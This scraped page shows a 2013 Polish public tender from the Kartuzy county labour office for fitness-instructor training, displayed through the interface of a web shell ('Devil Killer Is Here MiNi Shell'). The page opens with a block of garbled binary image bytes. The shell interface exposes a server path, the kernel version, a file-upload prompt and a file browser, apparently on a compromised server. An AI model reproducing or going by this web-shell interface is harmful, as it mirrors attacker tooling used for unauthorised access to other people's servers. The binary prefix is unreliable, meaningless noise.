JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131030/442616-N-2013.html

<p class="kh_header"><b>Kartuzy: Zorganizowanie i przeprowadzenie szkolenia pn. Instruktor rekreacji ruchowej w specjalności fitness dla uczestników/uczestniczek projektu ZAWÓD Z PRZYSZŁOŚCIĄ, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 442616 - 2013; data zamieszczenia: 30.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Kartuzach , ul. Mściwoja II 4, 83-300 Kartuzy, woj. pomorskie, tel. 058 6811452, faks 058 6814219.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.kartuzy.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Instruktor rekreacji ruchowej w specjalności fitness dla uczestników/uczestniczek projektu ZAWÓD Z PRZYSZŁOŚCIĄ, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia  Instruktor rekreacji ruchowej w specjalności fitness dla 21 uczestników/uczestniczek projektu ZAWÓD Z PRZYSZŁOŚCIĄ, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. Szkoleniem zostanie objętych maksymalnie 21 osób bezrobotnych w 2 grupach szkoleniowych: GRUPA I - 11 osób, GRUPA II - 10 osób. Zajęcia dla każdej z grup prowadzone będą odrębnie, w następujących po sobie odstępach czasowych ustalonych przez Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany liczby uczestników/uczestniczek szkolenia zgodnie z dopuszczalnymi zmianami warunków umowy. Celem szkolenia jest nabycie przez uczestników/czki projektu  kwalifikacji w zawodzie Instruktor rekreacji ruchowej w specjalności fitness oraz przygotowanie uczestników/uczestniczek projektu do wykonywania zawodu instruktora rekreacji ruchowej w specjalności fitness. Szkoleniem zostanie objętych 21 osób bezrobotnych, posiadających wykształcenie minimum średnie. Planowany okres realizacji szkolenia, zgodnie z harmonogramem realizacji projektu ZAWÓD Z PRZYSZŁOŚCIĄ: listopad 2013- luty 2014 r., w tym: GRUPA I: listopad - grudzień 2013, GRUPA II: styczeń -  luty 2014. Liczba godzin szkolenia wynosi łącznie 100 godzin zegarowych, w tym 30 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych/grupę szkoleniową. Godzina zegarowa szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą 15 minut. Długość przerw  może być ustalana w sposób elastyczny. Szkolenie musi obejmować zajęcia teoretyczne i praktyczne, realizowane według planu nauczania, obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. 2013 nr 0 poz. 674) oraz nie więcej niż 8 godzin dziennie w ramach zajęć teoretycznych oraz nie więcej niż 6 godzin dziennie w ramach zajęć praktycznych. Liczba godzin szkolenia powinna być dostosowana do możliwości fizycznych uczestników/uczestniczek szkolenia. Szkolenie musi odbywać się w dniach od poniedziałku do piątku z wyłączeniem świąt. Wykonawca zapewni każdego dnia zajęć co najmniej 1 przerwę kawową oraz jedną przerwę obiadową. Szczegółowy harmonogram zajęć zostanie ustalony przed zawarciem umowy. Termin realizacji zamówienia:termin rozpoczęcia realizacji szkolenia, w tym zajęć dla każdej z  grup wyznacza Zamawiający.
Zajęcia teoretyczne i praktyczne powinny odbywać się na terenie powiatu kartuskiego. Dopuszcza się realizację szkolenia poza powiatem kartuskim - w takim przypadku Wykonawca jest zobowiązany do zapewnienia uczestnikom/czkom we własnym zakresie zbiorowego transportu z Żukowa do miejsca realizacji szkolenia i z powrotem w każdym dniu szkolenia (Zamawiający nie dopuszcza możliwości  samodzielnego dojazdu uczestników/uczestniczek na miejsce szkolenia oraz zwrotu przez Wykonawcę kosztów dojazdu na szkolenie uczestnikom/uczestniczkom; Wykonawca jest zobowiązany do zorganizowania transportu uczestnikom/czkom poprzez np. wynajęcie busa)..  Koszt przewozu uczestników/czek na szkolenie  Wykonawca musi uwzględnić w formularzu cenowym  stanowiącym załącznik nr 1 do SIWZ. Program szkolenia powinien obejmować zagadnienia z zakresu (minimum):1.Podstawy anatomii, fizjologii, biomechaniki;2.Podstawowe ćwiczenia wzmacniające;3.Stretching;4.Kroki fitness (podstawowe i alternatywne);5.Cuening;6.Kierunki choreografii;7.Metodyka procesu dydaktycznego;8.Praca z muzyką i jej wykorzystanie w prowadzeniu zajęć;9.Warsztaty praktyczne.Program szkolenia może być uzupełniony o tematykę związaną z zakresem tematycznym ww. szkolenia i poszerzony o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników/uczestniczek szkolenia do prowadzenia zajęć z zakresu fitness.
Szkolenie prowadzone musi być w formie zajęć teoretycznych i praktycznych, z zastosowaniem metod niezbędnych do właściwego przygotowania uczestników/uczestniczek szkolenia do wykonywania zawodu instruktora rekreacji ruchowej w specjalności fitness.  W ramach zajęć praktycznych każdy uczestnik/każda uczestniczka musi powtarzać/wykonywać ćwiczenia zaprezentowane przez prowadzącego. Ponadto każdy uczestnik/ każda uczestniczka musi nabyć umiejętności  samodzielnego prowadzenia zajęć fitness. Na zakończenie szkolenia każdy/każda uczestnik/uczestniczka musi samodzielnie poprowadzić (krótkie) pokazowe zajęcia z wykorzystaniem technik, z którymi zapoznał/a się w trakcie szkolenia. Pokaz ten oceniany będzie podczas egzaminu praktycznego na zakończenie szkolenia. Po ukończeniu szkolenia Wykonawca winien zorganizować uczestnikom/uczestniczkom szkolenia egzamin wewnętrzny teoretyczny i praktyczny, potwierdzający nabyte umiejętności. Wydanie zaświadczeń/certyfikatów/dokumentów: do zadań Wykonawcy należy wydanie odpowiedniego dokumentu, stwierdzającego ukończenie szkolenia, tj.: Zaświadczenia wraz z suplementem lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, zgodnego z obowiązującymi przepisami prawa, Certyfikatu stwierdzającego ukończenie szkolenia, który musi zawierać informacje o współfinansowaniu szkolenia przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, opatrzonego logotypami PO KL oraz UE, Dokumentu/ów wydanego/wydanych na podstawie odrębnych przepisów. 
WYKONAWCA ZOBOWIĄZANY JEST DO WYDANIA KAŻDEMU/KAŻDEJ UCZESTNIKOWI/UCZESTNICZCE ZAŚWIADCZENIA/DOKUMENTU (WYDANY NA PODSTAWIE ODRĘBNYCH PRZEPISÓW) ORAZ CERTYFIKATU.
W ramach zamówienia Wykonawca zobowiązany jest wyposażyć i przekazać każdemu Uczestnikowi/każdej Uczestniczce szkolenia następujące materiały dydaktyczne, łącznie dla całej grupy:notatnik formatu A4- 21 sztuk,długopis -21 sztuk,teczka z gumką A4 - 21 sztukskrypt autorski z zakresu szkolenia*- 21 sztuk, podręcznik z dziedziny fitness- 21 sztuk. Skrypt autorski wykonany przez instytucję szkoleniową, składający się z min. 20 stron A4. Wykonawca przenosi nieodpłatnie na Zamawiającego autorskie prawa majątkowe do wszystkich materiałów szkoleniowych, na czas nieokreślony do wykorzystywania na wszystkich polach eksploatacji zgodnie z ustawą o prawach autorskich i prawach pokrewnych (Dz.U. z 2006r. Nr 90, poz. 631 z późn.zm.) Zapewnienie odpowiednio wykwalifikowanych trenerów/instruktorów, spełniających wymagania Zamawiającego określone w warunkach udziału w postępowaniu;
Szczegółowe wymagania odnośnie kwalifikacji kadry dydaktycznej określono w warunkach udziału w postępowaniu ( ROZDZIAŁ III SIWZ).
Informacje te muszą bezwzględnie znaleźć się na druku stanowiącym załącznik nr 5 do SIWZ. Zapewnienie cateringu: Przedmiot zamówienia obejmuje świadczenie usług cateringowych w postaci:serwisu kawowego obejmującego: kawę (typu Jacobs lub równoważną podaną w termosach po 300 ml na osobę), herbatę (typu Lipton lub równoważną podaną w termosach po 300 ml na osobę), dodatki: śmietanka do kawy, cytryna i cukier (w ilości proporcjonalnej do liczby uczestników), ciastka kruche (5 szt. na osobę) dodatkowo wodę mineralną - gazowaną i niegazowaną (co najmniej 1 l na osobę) oraz napój izotoniczny (co najmniej 0,5 l na osobę). w przerwie obiadowej Wykonawca zapewnia urozmaicone, gotowe kanapki zrobione z bułek białych lub z ziarnami smarowanych masłem, łącznie w ilości po 3 sztuki na osobę. Wkład kanapki podstawowy: wędlina (szynka, polędwica) ser żółty, ryba, twarożek Dodatki warzywne: sałata, pomidor, ogórek świeży lub konserwowy, papryka, szczypiorek itp. Wykonawca zapewnia catering w postaci kanapek i serwisu kawowego w każdy dzień szkoleniowy. Uwaga: Kanapki mają być sporządzane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Muszą być wykonywane bezpośrednio przed podaniem w danym dniu szkoleniowym, ze świeżych artykułów spożywczych posiadających aktualne daty ważności. Wyżej wymieniony skład kanapek stanowi przykład, Wykonawca może zaproponować składniki o nie gorszej, jakości, ponadto wymaga się wprowadzenia urozmaicenie menu w taki sposób, aby skład kanapek oraz rodzaje ciastek zmieniały się w poszczególnych dniach szkolenia.1.Po zakończeniu szkolenia Wykonawca zobowiązany jest do przeprowadzenia ankiet ewaluacyjnych wśród Uczestników/Uczestniczek szkolenia wg wzorów przedstawionych przez Zamawiającego.2.Ponadto Wykonawca zobowiązany jest do zapewnienia opiekuna z ramienia Instytucji szkoleniowej min. 1 osoba (nie dopuszcza się łączenia funkcji wykładowcy oraz opiekuna- koordynatora w jednej osobie), czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z Uczestnikami/Uczestniczkami szkolenia oraz Zamawiającym. Ubezpieczenie NNW, koszty badań lekarskich  pokrywa Zamawiający.Koszty materiałów dydaktycznych pokrywa jednostka szkoląca, tj. wchodzą w ogólny koszt szkolenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagań w zakresie ww. warunku. Zamawiający nie dokonuje opisu sposobu spełniania warunku.
W związku z tym ocena spełnienia przedmiotowego warunku zostanie dokonana jedynie na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagań w zakresie ww. warunku. Zamawiający nie dokonuje opisu sposobu spełniania warunku.
W związku z tym ocena spełnienia przedmiotowego warunku zostanie dokonana jedynie na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca dla każdej z dwóch grup zapewnia salę szkoleniową, dydaktyczną do prowadzenia zajęć teoretycznych, spełniającą następujące warunki: miejsce zapewniające swobodną oraz niezakłóconą naukę dla 11 osób jednocześnie zgodnie z przepisami BHP (możliwość ustawienia stolików w podkowę, krzesła); sprawną i wydajną wentylację ( temperatura w salach 22OC - 23OC); oświetlenie dzienne i sztuczne; WC (toaleta musi być łatwo dostępna, posprzątana, wyposażona w środki czystości); Wymagane wyposażenie Sali wykładowej: rzutnik multimedialny + ekran kpl. 1, flipchart lub tablicę szt. 1, papier do flipchartu (wg zapotrzebowania) laptop 1 szt. (lub inny równoważny sprzęt), drukarka komputerowa szt. 1, papier do wydruków (wg zapotrzebowania). 2.Ponadto Wykonawca dla każdej z dwóch grup zapewnia salę do prowadzenia zajęć praktycznych. Sala powinna spełniać wymagania sanitarne określone w rozporządzeniu Ministra Zdrowia z dnia 17 lutego 2004 r. w sprawie szczegółowych wymagań sanitarnych, jakim powinny odpowiadać zakłady fryzjerskie, kosmetyczne, tatuażu i odnowy biologicznej (Dz. U. z 2004 r. Nr 31 poz. 273 z późn. zm.). Wymagane wyposażenie Sali do ćwiczeń: hantel 0,5 kg- 22 szt., hantel 1 kg- 22 szt., step do aerobiku- 11 szt., mata do ćwiczeń- 11 szt., piłka gimnastyczna- 11 szt., gumy fitness- 11 szt, lustra ścienne, urządzenie do odtwarzania muzyki (z głośnikami)- 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla każdej z dwóch grup kadra dydaktyczna, składająca się z min. 2 osób, w tym:1 wykładowcy/trenera, posiadającego wykształcenie wyższe w zakresie wychowania fizycznego/ sportu/ fizjoterapii/  medycyny/pielęgniarstwa oraz doświadczenie w prowadzeniu grupowych szkoleń/zajęć z  anatomii i fizjologii, w postaci przeprowadzenia min. 3 szkoleń/zajęć, jako nauczyciel/trener/ wykładowca w okresie ostatnich 3 lat przed upływem terminu składania ofert; 1 instruktora fitness, posiadającego kwalifikacje poświadczone dyplomem instruktora rekreacji ruchowej w specjalności fitness oraz co najmniej 2- letnie doświadczenie w prowadzeniu grupowych zajęć fitness oraz doświadczenie w prowadzeniu grupowych szkoleń z  rekreacji ruchowej w specjalności fitness, w postaci przeprowadzenia min. 3 szkoleń/ zajęć, jako nauczyciel/ trener/ wykładowca w okresie ostatnich 3 lat przed upływem terminu składania ofert; 1 instruktora tańca/choreografa, posiadającego co najmniej 2 letnie doświadczenie w prowadzeniu grupowych zajęć tanecznych oraz doświadczenie w prowadzeniu szkoleń z  zakresu tańca/choreografii, w postaci przeprowadzenia min. 3 szkoleń/ zajęć, jako nauczyciel/ trener/ wykładowca w okresie ostatnich 3 lat przed upływem terminu składania ofert. UWAGA: Zamawiający dopuszcza możliwość połączenia funkcji: wykładowcy/trenera w zakresie anatomii i fizjologii oraz instruktora fitness i/lub; wykładowcy/trenera w zakresie anatomii i fizjologii oraz instruktora tańca/choreografa. Wykonawca w celu zapewnienia odpowiedniej realizacji usługi zapewni w całym okresie trwania szkolenia swojego przedstawiciela-Koordynatora. Koordynatorem musi być osoba niezależna od zespołu trenerskiego. Koordynator odpowiada za nadzór nad realizacją szkolenia. (Wykonawca powinien wykazać tylko i wyłącznie osoby, które będą zaangażowane w realizację szkolenia)UWAGA: Zamawiający zastrzega sobie prawo żądania dokumentów potwierdzających posiadane kwalifikacje i doświadczenia poszczególnych wykładowców/instruktorów, przed lub po podpisaniu umowy w sprawie udzielenia zamówienia publicznego, w celu potwierdzenia prawdziwości złożonych oświadczeń. UWAGA: Jeśli Wykonawca planuje dołączyć również innych wykładowców do przeprowadzenia szkolenia, każdy z nich musi posiadać ww. kwalifikacje oraz doświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo wymagań w zakresie ww. warunku. Zamawiający nie dokonuje opisu sposobu spełniania warunku.
W związku z tym ocena spełnienia przedmiotowego warunku zostanie dokonana jedynie na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków z art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie osób, które będą uczestniczyć w wykonywaniu zamówienia - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)ZMIANA WYNAGRODZENIA - POMNIEJSZENIE WYNAGRODZENIA - wysokość wynagrodzenia za wykonanie usługi szkoleniowej będzie mogła ulec zmianie tj. pomniejszeniu, w przypadku przeszkolenia mniejszej niż podana ilość osób. Zamawiający podał w celu ustalenia ceny oferty ilość osób do przeszkolenia. Z przyczyn niezależnych od Zamawiającego (przerwania szkolenia przez osobę skierowaną przez PUP) ilość osób może ulec pomniejszeniu, wobec powyższego Zamawiający zapłaci za faktycznie przeszkoloną liczbę osób a koszty stałe pozostaną bez zmian.b)ZMIANA KADRY DYDAKTYCZNEJ - Wykonawca może dokonywać zmiany kadry dydaktycznej  wskazanej do realizacji zamówienia w ofercie przetargowej, jedynie za uprzednią pisemną zgodą Zamawiającego akceptującego nowy personel. Wykonawca z własnej inicjatywy proponuje zmianę kadry dydaktycznej w następujących UZASADNIONYCH przypadkach:Śmierci, choroby lub innych zdarzeń losowych kadry dydaktycznej,Niewywiązywania się kadry dydaktycznej z obowiązków wynikających z umowy,Jeżeli zmiana kadry dydaktycznej stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji  z pracy lub zlecenia),Zamawiający może żądać od Wykonawcy, w formie pisemnej, umotywowanego wniosku, zmiany kadry dydaktycznej, jeżeli uzna że dana osoba nie wykonuje swoich obowiązków wynikających z umowy,W przypadku zmiany kadry dydaktycznej - poszczególnych nauczycieli, trenerów, wykładowców, nowy nauczyciel, trener, wykładowca musi spełniać wymagania określone w SIWZ dla danego członka kadry dydaktycznej, Występując z wnioskiem o zmianę kadry dydaktycznej Wykonawca zobowiązany będzie wskazać przyczyny niedostępności osoby zastępowanej, a także przedstawić PUP kwalifikacje osoby proponowanej w zastępstwie, wskazać czynności, które będą wykonywane oraz zakres zastępstwa. Zmiany kadry dydaktycznej nie wymagają wprowadzenia zmian do umowy w formie aneksu.c)ZMIANA MIEJSCA REALIZACJI SZKOLENIA - Wykonawca może dokonywać zmiany miejsca szkolenia (sali szkoleniowej) wskazanej do realizacji zamówienia w ofercie przetargowej, jedynie za uprzednią pisemną zgodą Zamawiającego.5)Wszelkie zmiany umowy w ramach regulacji art. 144 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t. j. Dz. U. z 2013 r. poz. 907 z późn. zm.) wymagają formy pisemnej pod rygorem nieważności.6)Jeżeli Wykonawca, którego oferta została wybrana, uchyli się od zawarcia umowy w sprawie zamówienia publicznego, Zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert bez przeprowadzenia ich ponownego badania i oceny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.kartuzy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Mściwoja II 4
83-300 Kartuzy
stanowisko 3 (Dział Szkoleń).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2013 godzina 11:00, miejsce: ul. Mściwoja II 4
83-300 Kartuzy
Sekretariat Urzędu (pokój 20).</p>
